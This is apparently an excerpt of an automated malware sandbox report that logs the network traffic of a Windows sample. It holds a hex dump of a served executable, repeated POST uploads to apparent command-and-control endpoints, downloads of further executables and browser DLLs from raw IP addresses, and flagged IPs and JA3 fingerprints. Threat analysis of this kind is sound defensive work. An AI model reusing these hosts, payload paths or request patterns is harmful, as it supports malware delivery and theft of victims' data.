Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:23:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:16:06 GMTETag: "205e00-619570326fd80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.102.42.29 104.102.42.29
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.235.137.54 185.235.137.54
Source: Joe Sandbox View	IP Address: 185.235.137.54 185.235.137.54

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UNINETAZ UNINETAZ

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1230Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582478Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5645Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129229Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xdtlvnnwnlpkuygk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ytvhsyvyrbixtfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://txpgggtypbkripei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nwyllkfdfrdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpbahollcwbghe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oygcwhbcxoopv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fjtoifbsexibjqos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eaiecpphhehnp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ohbpdxbbqxsqjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thknwrjryktui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrnhbbwrygn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uhruuiuofju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gdrusktiywhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dswkxseehrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etlthdykpik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://urrnadxnpwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hnoddeyuysdltft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://djnjnheylgenw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mvirbkubtmy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukxbtouqvjwpgrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lttuitxyemp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://haljhouhmvighpi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bkjyrxsoflynogyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iymhuqeqmdev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rscrbtwfrpl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://feebaxojoajqvghx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://flowliaawjqccjvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnklpspcfvmivsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://juuhlbwtemhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uipcoqrcfmpaso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dbfhns.in

Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFACC60 PR_Recv,

9_2_6CFACC60

